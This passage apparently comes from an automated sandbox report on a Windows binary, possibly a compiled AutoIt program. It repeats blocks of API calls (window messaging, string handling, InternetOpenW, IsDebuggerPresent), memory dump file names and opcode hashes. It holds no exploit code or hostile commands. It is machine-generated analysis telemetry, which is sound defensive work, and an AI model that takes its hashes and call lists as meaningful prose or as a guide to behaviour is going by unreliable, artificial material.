                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001A365C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$DestroyMove
                • String ID: static
                • API String ID: 2139405536-2160076837
                • Opcode ID: f92532f9489360fc455e8507416beeeaeab64a648c939752bd5170918dd75808
                • Instruction ID: 70390b1209a1119224a58b77a9e73e49c109b0cda5935ea5d1abcf389dc80ba8
                • Opcode Fuzzy Hash: f92532f9489360fc455e8507416beeeaeab64a648c939752bd5170918dd75808
                • Instruction Fuzzy Hash: 90318B75500204AEDB149F68DC80FFB73A9FF99760F008619F8A997280DB31ED91DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 001A461F
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A4634
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                • Opcode ID: 4bdb222a4ead78e4d1382e7f66641105f834fa2b8b295df1fac67fd7681edb04
                • Instruction ID: bbde123afdd711ae0205bbfb515e3a3cc6e1743f1be6ad113838eb469440c09a
                • Opcode Fuzzy Hash: 4bdb222a4ead78e4d1382e7f66641105f834fa2b8b295df1fac67fd7681edb04
                • Instruction Fuzzy Hash: 1231F978E013099FDB14CFA9C991BDA7BB5FF8A304F154069E905AB351D7B0A941CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001533A2
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00113A04
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconLoadNotifyShell_String_wcslen
                • String ID: Line:
                • API String ID: 2289894680-1585850449
                • Opcode ID: bff7a94ab6f31ab88a6afac94ae37c09d603ab4b1d8946c744dca38bc5410d1b
                • Instruction ID: 2eb0148cf9b69efa3abd140599ee3962fb8597af74191815f2bfca2fa8455109
                • Opcode Fuzzy Hash: bff7a94ab6f31ab88a6afac94ae37c09d603ab4b1d8946c744dca38bc5410d1b
                • Instruction Fuzzy Hash: F131D071408344AAC329EB60DC45BEFB7E8BF54724F00493AF5A997591EB709AC9C7C2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001A327C
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A3287
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Combobox
                • API String ID: 3850602802-2096851135
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0011600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0011604C
                  • Part of subcall function 0011600E: GetStockObject.GDI32(00000011), ref: 00116060
                  • Part of subcall function 0011600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0011606A
                • GetWindowRect.USER32(00000000,?), ref: 001A377A
                • GetSysColor.USER32(00000012), ref: 001A3794
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ColorCreateMessageObjectRectSendStock
                • String ID: static
                • API String ID: 1983116058-2160076837
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0018CD7D
                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0018CDA6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Internet$OpenOption
                • String ID: <local>
                • API String ID: 942729171-4266983199
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 001A34AB
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001A34BA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LengthMessageSendTextWindow
                • String ID: edit
                • API String ID: 2978978980-2167791130
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • CharUpperBuffW.USER32(?,?,?), ref: 00176CB6
                • _wcslen.LIBCMT ref: 00176CC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: STOP
                • API String ID: 1256254125-2411985666
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00171D4C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00171C46
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00171CC8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00171DD3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClassMessageNameSend_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 624084870-1403004172
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: 3, 3, 16, 1
                • API String ID: 176396367-3042988571
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00170B23
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Message
                • String ID: AutoIt$Error allocating memory.
                • API String ID: 2030045667-4017498283
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0012F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00130D71,?,?,?,0011100A), ref: 0012F7CE
                • IsDebuggerPresent.KERNEL32(?,?,?,0011100A), ref: 00130D75
                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0011100A), ref: 00130D84
                Strings
                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00130D7F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                • API String ID: 55579361-631824599
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LocalTime
                • String ID: %.3d$X64
                • API String ID: 481472006-1077770165
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001A232C
                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001A233F
                  • Part of subcall function 0017E97B: Sleep.KERNEL32 ref: 0017E9F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001A236C
                • PostMessageW.USER32(00000000), ref: 001A2373
                  • Part of subcall function 0017E97B: Sleep.KERNEL32 ref: 0017E9F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0014BE93
                • GetLastError.KERNEL32 ref: 0014BEA1
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014BEFC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID:
                • API String ID: 1717984340-0
                Uniqueness

                Uniqueness Score: -1.00%